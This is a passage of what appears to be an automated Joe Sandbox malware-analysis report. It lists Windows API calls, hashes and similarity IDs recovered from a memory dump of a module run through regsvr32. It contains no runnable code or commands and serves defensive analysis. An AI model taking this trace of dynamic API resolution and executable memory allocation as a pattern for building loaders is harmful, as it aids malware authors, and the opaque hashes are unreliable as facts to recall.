                • Instruction ID: aee952aee718b2804c39406e2ab7ff20962ef99645286ec665d581dbb1e49160
                • Opcode Fuzzy Hash: 016ab87063acefca6c2c858eaea8a597164dce1c31bf34d64fb241907d2f882d
                • Instruction Fuzzy Hash: 9C31AE75A00205ABCB21AF76DC8486EBBB9FFC9305B1444ABE802DF250F675E850CB31
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlImageNtHeader.NTDLL(00000000), ref: 04BDA5FA
                  • Part of subcall function 04BCE9B0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,04BDBCFE), ref: 04BCE9D6
                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,04BC7B94,00000000), ref: 04BDA63C
                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000001), ref: 04BDA68E
                • VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,00000000,00000000,?,00000000,00000000,00000001,?,00000000,04BC7B94,00000000), ref: 04BDA6A7
                  • Part of subcall function 04BD83BC: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 04BD83DD
                  • Part of subcall function 04BD83BC: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,?,?,?,04BDA62D,00000000,00000000,00000000,00000001,?,00000000), ref: 04BD8420
                • GetLastError.KERNEL32(?,00000000,04BC7B94,00000000,?,?,?,?,?,?,?,04BC8D64,?), ref: 04BDA6DF
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
                • String ID:
                • API String ID: 1921436656-0
                • Opcode ID: 4e96be77bcb446b3e3c8341d8181ecc0b6a3a8741b2198d4058fb976f5495b4c
                • Instruction ID: 8722893223465b19d890e2f9b98c0e98af4a4504bdcfac1b11e95dea9ae77c2e
                • Opcode Fuzzy Hash: 4e96be77bcb446b3e3c8341d8181ecc0b6a3a8741b2198d4058fb976f5495b4c
                • Instruction Fuzzy Hash: DF313E75A00209EFDF11EFA5DD40AAE7BB9EB48750F0040E6E905EB250E774AE40DBA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 04BD20E3: RtlEnterCriticalSection.NTDLL(04BEE4A8), ref: 04BD20EB
                  • Part of subcall function 04BD20E3: RtlLeaveCriticalSection.NTDLL(04BEE4A8), ref: 04BD2100
                  • Part of subcall function 04BD20E3: InterlockedIncrement.KERNEL32(0000001C), ref: 04BD2119
                • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 04BD3620
                • memcpy.NTDLL(00000000,?,?,?,00000000,?,?,?,?,?,?,?,04BDC9D5,?,00000000), ref: 04BD3631
                • lstrcmpi.KERNEL32(00000002,?), ref: 04BD3677
                • memcpy.NTDLL(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,04BDC9D5,?,00000000), ref: 04BD368B
                • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,04BDC9D5,?,00000000), ref: 04BD36D1
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
                • String ID:
                • API String ID: 733514052-0
                • Opcode ID: 0e843c24b869a548f985af6bc00ed7464833bc95c414f524c98a5b1dd54e856f
                • Instruction ID: eb1cf576ee79ee708117dfa7328ccd4cc1ca3ecddee8a2465ebf75823febd319
                • Opcode Fuzzy Hash: 0e843c24b869a548f985af6bc00ed7464833bc95c414f524c98a5b1dd54e856f
                • Instruction Fuzzy Hash: 4531A272A00219BFDB10EFA5DC84A9E7BF8FB44614F1400E9E905EB201E735ED44CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadLibraryA.KERNEL32(?,?,00000000,00000000,04BDE937,00000000,74E5F5B0,04BD47CC,?,00000001), ref: 04BD655E
                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,04BC8D64,?,?,?,?,?), ref: 04BD6573
                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,04BC8D64,?,?,?,?,?), ref: 04BD658F
                • GetProcAddress.KERNEL32(00000000,?), ref: 04BD65A4
                • GetProcAddress.KERNEL32(00000000,?), ref: 04BD65B8
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: LibraryLoad$AddressProc
                • String ID:
                • API String ID: 1469910268-0
                • Opcode ID: 0656100cf764a258876cde379140351a51c9e835ee92d61cf264339836639502
                • Instruction ID: f710d6c56eb715e914be17c340bbd5e80846c0dc55c24083455d8ad90f2fe58c
                • Opcode Fuzzy Hash: 0656100cf764a258876cde379140351a51c9e835ee92d61cf264339836639502
                • Instruction Fuzzy Hash: DF318D32A012069FDB00DF6AE980A5073E8FBC9314B01019BE508DF311E779FC428F66
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 04BD0D54: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74E05520,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0D66
                  • Part of subcall function 04BD0D54: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0D7F
                  • Part of subcall function 04BD0D54: GetCurrentThreadId.KERNEL32 ref: 04BD0D8C
                  • Part of subcall function 04BD0D54: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0D98
                  • Part of subcall function 04BD0D54: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0DA6
                  • Part of subcall function 04BD0D54: lstrcpy.KERNEL32(00000000), ref: 04BD0DC8
                • DeleteFileA.KERNEL32(00000000,000004D2), ref: 04BC5D6A
                • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 04BC5D73
                • GetLastError.KERNEL32 ref: 04BC5D7D
                • HeapFree.KERNEL32(00000000,00000000), ref: 04BC5E3C
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
                • String ID:
                • API String ID: 3543646443-0
                • Opcode ID: 9425e5b44a3782a9e3b05bb81ab1ea1413cb0dabe714b5bd0df41edd941d5a7f
                • Instruction ID: 6ae525a854b6ff69ac7d7322b85e80ced67a51c948cc8f885816abc0325027f7
                • Opcode Fuzzy Hash: 9425e5b44a3782a9e3b05bb81ab1ea1413cb0dabe714b5bd0df41edd941d5a7f
                • Instruction Fuzzy Hash: 2F2141B2601519ABE710BBB5EC8CE86339DDF86315F010096FA09DB162DA39F904DBB1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • StrChrA.SHLWAPI(04BC158F,0000002C,00000000,?,00000000,6D3C2A4F,6D3C2A4F,?,04BDCB18,?,04BC159F,04BC158F,00000000,0000000B,?,04BC158F), ref: 04BDBC51
                • StrRChrA.SHLWAPI(04BC158F,00000000,0000002F,?,00000000,6D3C2A4F,6D3C2A4F,?,04BDCB18,?,04BC159F,04BC158F,00000000,0000000B,?,04BC158F), ref: 04BDBC6A
                • StrTrimA.SHLWAPI(04BC158F,?,?,00000000,6D3C2A4F,6D3C2A4F,?,04BDCB18,?,04BC159F,04BC158F,00000000,0000000B,?,04BC158F,04BC158F), ref: 04BDBC92
                • StrTrimA.SHLWAPI(00000000,?,?,00000000,6D3C2A4F,6D3C2A4F,?,04BDCB18,?,04BC159F,04BC158F,00000000,0000000B,?,04BC158F,04BC158F), ref: 04BDBCA1
                • HeapFree.KERNEL32(00000000,04BC158F,04BC158F,00000000,00000000,?,00000000,6D3C2A4F,6D3C2A4F,?,04BDCB18,?,04BC159F,04BC158F,00000000,0000000B), ref: 04BDBCD8
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Trim$FreeHeap
                • String ID:
                • API String ID: 2132463267-0
                • Opcode ID: bb619916e605f6218e1041071be6e2150eaa7383f40799f9b4c61339c241ba6d
                • Instruction ID: e651bd568922202b12280a2a6cdfc8c4908c337bbe009f169eabb32cc0591b21
                • Opcode Fuzzy Hash: bb619916e605f6218e1041071be6e2150eaa7383f40799f9b4c61339c241ba6d
                • Instruction Fuzzy Hash: 8411CB3620421BFBDB219A6ADC85F977BACFB84750F1500A2F908DB141EBB4FD018B60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • VirtualProtect.KERNEL32(00000000,00000004,00000040,00000000,016595A8,00000000,04BC7B94,?,?,?,04BCA457,74E05520,?,04BDA6F4,00000000,00000000), ref: 04BD7834
                • VirtualProtect.KERNEL32(00000000,00000004,00000000,00000000,?,04BCA457,74E05520,?,04BDA6F4,00000000,00000000,?,00000000,04BC7B94,00000000), ref: 04BD7864
                • RtlEnterCriticalSection.NTDLL(04BEE480), ref: 04BD7873
                • RtlLeaveCriticalSection.NTDLL(04BEE480), ref: 04BD7891
                • GetLastError.KERNEL32(?,04BCA457,74E05520,?,04BDA6F4,00000000,00000000,?,00000000,04BC7B94,00000000), ref: 04BD78A1
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                • String ID:
                • API String ID: 653387826-0
                • Opcode ID: ed5c37073bc2a3b211508b1bd0bc84b4aa5fd950fd28ddc087e45903b68dfaa8
                • Instruction ID: a8f5b0e34ab7870ff0ff040b84ee09b69fea77bd25c1c82433b2fbfc2f207a02
                • Opcode Fuzzy Hash: ed5c37073bc2a3b211508b1bd0bc84b4aa5fd950fd28ddc087e45903b68dfaa8
                • Instruction Fuzzy Hash: CC21E9B5600B01EFE711DFAAC98595AB7F8FF08304B0086AAEA55D7710E774F914CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrcmpi.KERNEL32(00000000,?), ref: 04BCE72E
                • RtlEnterCriticalSection.NTDLL(04BEE4A8), ref: 04BCE73B
                • RtlLeaveCriticalSection.NTDLL(04BEE4A8), ref: 04BCE74E
                • lstrcmpi.KERNEL32(04BEE4C0,00000000), ref: 04BCE76E
                • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04BCC02E,00000000), ref: 04BCE782
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
                • String ID:
                • API String ID: 1266740956-0
                • Opcode ID: c7326c03b4d2c395c41c96e0886eb839efafe06c6339792af316c2c7c35032e8
                • Instruction ID: b161e56a7d77da863d369a978e8f5aea7c06fe04aa65a6289a95b79b26b08278
                • Opcode Fuzzy Hash: c7326c03b4d2c395c41c96e0886eb839efafe06c6339792af316c2c7c35032e8
                • Instruction Fuzzy Hash: D9114F32501205EFEB05DF5ED889A5DB7B8FF88334F05459AE409A7290D738ED41CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(04BC158F,00000000,04BE6C5B,00000000,04BE4160,04BC158F,?,?,04BDCD80,?,04BC159F,04BC158F,00000000,0000000B,?,04BC158F), ref: 04BC4001
                  • Part of subcall function 04BC8F9E: RtlAllocateHeap.NTDLL(00000000,?,04BC2180), ref: 04BC8FAA
                • lstrcpy.KERNEL32(00000000,04BC158F), ref: 04BC4025
                • StrRChrA.SHLWAPI(04BC158F,00000000,0000002E,?,00000003,?,?,04BDCD80,?,04BC159F,04BC158F,00000000,0000000B,?,04BC158F,04BC158F), ref: 04BC402C
                • lstrcpy.KERNEL32(00000000,?), ref: 04BC4074
                • lstrcat.KERNEL32(00000000,?), ref: 04BC4083
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: lstrcpy$AllocateHeaplstrcatlstrlen
                • String ID:
                • API String ID: 2616531654-0
                • Opcode ID: f586b7983eceda502cc467c8e383402b7aaa3013cb74bfb88a108f7a85ab7255
                • Instruction ID: a1d923baf5208ef9eb3e164ec895d1770ea5feb776ef7edbb858f20ff1ce06a1
                • Opcode Fuzzy Hash: f586b7983eceda502cc467c8e383402b7aaa3013cb74bfb88a108f7a85ab7255
                • Instruction Fuzzy Hash: 7F11C232240606ABD320EE7AE9C8E6BB7ECEBC4751F05456EF505C7202DB65E904C772
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 04BDBDF1: lstrlen.KERNEL32(?,00000001,?,00000008,04BDD288,?,00000000,00000001,00000000,0624C088,0624C088,00000000,04BC832B,00000000,?,?), ref: 04BDBDFD
                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 04BD2684
                • memcpy.NTDLL(00000000,?,?), ref: 04BD2697
                • RtlEnterCriticalSection.NTDLL(04BEE4A8), ref: 04BD26A8
                • RtlLeaveCriticalSection.NTDLL(04BEE4A8), ref: 04BD26BD
                • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 04BD26F5
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
                • String ID:
                • API String ID: 2349942465-0
                • Opcode ID: 3faf5c7f5cdd4e216843000b857974dd699b1c1bda8d2706756db44512fff8d8
                • Instruction ID: 9662687b5894ce2987bcfb7ed4685878ab3c949505f3111c7de8fc9555d9b922
                • Opcode Fuzzy Hash: 3faf5c7f5cdd4e216843000b857974dd699b1c1bda8d2706756db44512fff8d8
                • Instruction Fuzzy Hash: 2011CE72105250AFE711AF2AEC84C2B7B78EFC9335B0504EBF80597241EB39AC059BB1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(04BC78A1,00000000,00000000,00000000,?,04BDAE43,?,04BC78A1,00000000), ref: 04BE4FA8
                • lstrlen.KERNEL32(?,?,04BDAE43,?,04BC78A1,00000000), ref: 04BE4FAF
                • RtlAllocateHeap.NTDLL(00000000,00000029), ref: 04BE4FBD
                  • Part of subcall function 04BCD2FC: GetLocalTime.KERNEL32(04BDAE43,04BDAE43,?,04BC78A1,00000000), ref: 04BCD306
                  • Part of subcall function 04BCD2FC: wsprintfA.USER32 ref: 04BCD339
                • wsprintfA.USER32 ref: 04BE4FDF
                  • Part of subcall function 04BE3B15: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,04BE5007,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 04BE3B33
                  • Part of subcall function 04BE3B15: wsprintfA.USER32 ref: 04BE3B58
                • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 04BE5010
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
                • String ID:
                • API String ID: 3847261958-0
                • Opcode ID: 687e8d53d31c99fc3e0456921889b21e00b4e3307592cfcfd550d8fe09800ef0
                • Instruction ID: 4517ae1c40b2416d95e2d34d0ebe3785778d48922b4b33e3bd1f0576431829d4
                • Opcode Fuzzy Hash: 687e8d53d31c99fc3e0456921889b21e00b4e3307592cfcfd550d8fe09800ef0
                • Instruction Fuzzy Hash: 89013C31100618BFEB216F66DC48DAB7F6DEFC4264B008462FD089B112D6369965ABB0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 04BDFEBB
                  • Part of subcall function 04BC2A41: wcstombs.NTDLL ref: 04BC2AFF
                • lstrlen.KERNEL32(?,?,?,?,?,04BDF400,?,?), ref: 04BDFEDE
                • lstrlen.KERNEL32(?,?,?,?,04BDF400,?,?), ref: 04BDFEE8
                • memcpy.NTDLL(?,?,00004000,?,?,04BDF400,?,?), ref: 04BDFEF9
                • HeapFree.KERNEL32(00000000,?,?,?,?,04BDF400,?,?), ref: 04BDFF1B
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Heaplstrlen$AllocateFreememcpywcstombs
                • String ID:
                • API String ID: 1256246205-0
                • Opcode ID: caeb96c63fdc2129c0949ab970df1f2becc9997635b2afb49f07cdca6bfbcc60
                • Instruction ID: 9b72c68517d575a5eb44e7ab60ef8fdfd7105f6527d1ea38787f485d268f29fa
                • Opcode Fuzzy Hash: caeb96c63fdc2129c0949ab970df1f2becc9997635b2afb49f07cdca6bfbcc60
                • Instruction Fuzzy Hash: 4D11A171604204FFDB109F65EC44F6E7BB9EB85310F1040A5F806E7250E731AD009B30
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 04BC1B8A: lstrlen.KERNEL32(?,00000008,00000000,?,00000000,04BDDB18,?,?,00000000,04BCC692,?,?,?,?,00000000,?), ref: 04BC1B99
                  • Part of subcall function 04BC1B8A: mbstowcs.NTDLL ref: 04BC1BB5
                • lstrlenW.KERNEL32(00000000,00000000,00000094,?,00000000,?,?,04BD7126,?), ref: 04BE2E9A
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BE2EAC
                • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,04BD7126,?), ref: 04BE2EC9
                • lstrlenW.KERNEL32(00000000,?,?,04BD7126,?), ref: 04BE2ED5
                • HeapFree.KERNEL32(00000000,00000000,?,?,04BD7126,?), ref: 04BE2EE9
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
                • String ID:
                • API String ID: 3403466626-0
                • Opcode ID: ab28037a9c4fbc63106eb74ada98ac400247c5dfc358ab5ca7b411da41b99ee6
                • Instruction ID: 6730ae6a3b60a0bf9b42024a43081b742eef3acc9f5dca84c0d750a0f7e10b00
                • Opcode Fuzzy Hash: ab28037a9c4fbc63106eb74ada98ac400247c5dfc358ab5ca7b411da41b99ee6
                • Instruction Fuzzy Hash: 01014C72101618AFE712EBAAEC84FAE77ACEF88314F144066F505AB151C778AD049B75
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetModuleHandleA.KERNEL32 ref: 04BDDC2D
                • GetModuleHandleA.KERNEL32 ref: 04BDDC3B
                • LoadLibraryExW.KERNEL32(?,?,?), ref: 04BDDC48
                • GetModuleHandleA.KERNEL32 ref: 04BDDC5F
                • GetModuleHandleA.KERNEL32 ref: 04BDDC6B
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: HandleModule$LibraryLoad
                • String ID:
                • API String ID: 1178273743-0
                • Opcode ID: c2db622b78bf7948814d9faaba37ecc666ed3aceaeabebdf81b118cbd14ce73f
                • Instruction ID: a2b46dddf5739058456fe9b890f211a4843517a09965ea7af2f6e080ca741774
                • Opcode Fuzzy Hash: c2db622b78bf7948814d9faaba37ecc666ed3aceaeabebdf81b118cbd14ce73f
                • Instruction Fuzzy Hash: 7B01867160020AAB9F015F7AEC4096A7BADFF54360B0841B7F814C7160EBB5DC219FE0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetCurrentThreadId.KERNEL32 ref: 04BD7630
                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000040,?,?,?,?,?,?,04BD5DB1,00000000,?), ref: 04BD7640
                • CloseHandle.KERNEL32(00000000,?,?,00000040,?,?,?,?,?,?,04BD5DB1,00000000,?), ref: 04BD7649
                • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,04BDC365,?,?,00000040,?,?,?,?,?,?,04BD5DB1), ref: 04BD7667
                • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,04BDC365,?,?,00000040,?,?,?,?,?,?,04BD5DB1), ref: 04BD7674
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: FreeVirtual$CloseCurrentHandleObjectSingleThreadWait
                • String ID:
                • API String ID: 3667519916-0
                • Opcode ID: 8fc18652bbc7913026360f5a337df0f2e95455fca268b0ed429b1eddc74d07f1
                • Instruction ID: e170015a693afff3bc9f2d20dbac7d8ae0f281710bd3ecaea953712076063ab5
                • Opcode Fuzzy Hash: 8fc18652bbc7913026360f5a337df0f2e95455fca268b0ed429b1eddc74d07f1
                • Instruction Fuzzy Hash: 75F01D30200B00AFE7307A3A9C88F5A72A8EB84355F144699F54197590EB24FC45CA34
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04BCA71A
                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04BCA730
                • memset.NTDLL ref: 04BCA7D9
                • memset.NTDLL ref: 04BCA7EF
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: memset$_allmul_aulldiv
                • String ID:
                • API String ID: 3041852380-0
                • Opcode ID: 6145155e482e3399a7cbdfbc77eb9846a4476fa9d641cf7d02693bad88dbf283
                • Instruction ID: a4d9612a6c3ec42a194234bbfc0f6413213b71250bb45e7b542b7397a404b3a6
                • Opcode Fuzzy Hash: 6145155e482e3399a7cbdfbc77eb9846a4476fa9d641cf7d02693bad88dbf283
                • Instruction Fuzzy Hash: D141A531701219AFEB10DF68CC84BEE7779EF89714F0045AAF915A7280EB70BE548B91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • WaitForSingleObject.KERNEL32(00000000), ref: 04BE592F
                • GetLastError.KERNEL32 ref: 04BE594F
                  • Part of subcall function 04BC2A41: wcstombs.NTDLL ref: 04BC2AFF
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: ErrorLastObjectSingleWaitwcstombs
                • String ID:
                • API String ID: 2344289193-0
                • Opcode ID: 24f20ed5a6b307bf369b000d67a218d56b6ca9d3d7a2c29ac46be9f631b3f166
                • Instruction ID: 4e7e3df25fb813be606a0329fba3a8d1e51bb9d4a7b2ebb5f022f9daf136effc
                • Opcode Fuzzy Hash: 24f20ed5a6b307bf369b000d67a218d56b6ca9d3d7a2c29ac46be9f631b3f166
                • Instruction Fuzzy Hash: EB412974900209FFDF209FE6C8845FEBBB9EB94359F5044AAE502E7150E774AA40DB61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: _strupr
                • String ID:
                • API String ID: 3408778250-0
                • Opcode ID: a216f60fa8636f71f45e8e2dab5405986e4f2247f3db7f1708f8bd1b1ff6c476
                • Instruction ID: 8ce12a2cef8840f0760f1af78a4195f2c2ac1ba92c79f055b97f63b1aec35124
                • Opcode Fuzzy Hash: a216f60fa8636f71f45e8e2dab5405986e4f2247f3db7f1708f8bd1b1ff6c476
                • Instruction Fuzzy Hash: 9041537180020A9EEF21DF69D884AFEB7FCEF94308F5148A5E825D6150EB74F545CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 04BD17C3: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000), ref: 04BD17D1
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BDEE23
                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04BDEE72
                  • Part of subcall function 04BE36FE: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,04BE4FFC), ref: 04BE373F
                  • Part of subcall function 04BE36FE: GetLastError.KERNEL32 ref: 04BE3749
                  • Part of subcall function 04BE36FE: WaitForSingleObject.KERNEL32(000000C8), ref: 04BE376E
                  • Part of subcall function 04BE36FE: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 04BE378F
                  • Part of subcall function 04BE36FE: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 04BE37B7
                  • Part of subcall function 04BE36FE: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 04BE37CC
                  • Part of subcall function 04BE36FE: SetEndOfFile.KERNEL32(00000006), ref: 04BE37D9
                  • Part of subcall function 04BE36FE: CloseHandle.KERNEL32(00000006), ref: 04BE37F1
                • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,?,?,04BD6D4E,?,?,?,?,?,?), ref: 04BDEEA7
                • HeapFree.KERNEL32(00000000,?,?,?,?,04BD6D4E,?,?,?,?,?,?,00000000,?,00000000), ref: 04BDEEB7
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
                • String ID:
                • API String ID: 4200334623-0
                • Opcode ID: ebbf0dfe88a5aaa2140efb5701e3dfd6e58978608cc7de295c7fb22624b6a081
                • Instruction ID: 044188718ba2fead10b40e6ddfa908d35beb7ccb6fd95be29b437c55cbd0b986
                • Opcode Fuzzy Hash: ebbf0dfe88a5aaa2140efb5701e3dfd6e58978608cc7de295c7fb22624b6a081
                • Instruction Fuzzy Hash: 483137B6500119FFEB10DFA5DC89CAABBBEEB88354B1004A6F504EB150D771AE51DB70
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • TlsGetValue.KERNEL32(?), ref: 04BD6482
                • SetEvent.KERNEL32(?), ref: 04BD64CC
                • TlsSetValue.KERNEL32(00000001), ref: 04BD6506
                • TlsSetValue.KERNEL32(00000000), ref: 04BD6522
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Value$Event
                • String ID:
                • API String ID: 3803239005-0
                • Opcode ID: 111c45b91649503ceb8edb3097dc9f594ea5c3871d09b5be702eb28829787012
                • Instruction ID: 071bf91f86a840ca7d2176115148785c3eb976a5b4d51bc924acd029139eb5cd
                • Opcode Fuzzy Hash: 111c45b91649503ceb8edb3097dc9f594ea5c3871d09b5be702eb28829787012
                • Instruction Fuzzy Hash: F021B031200248AFEB319F5ADE84A6A7BA2FF85354F1005A9F501CB560E372FDA1DF51
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
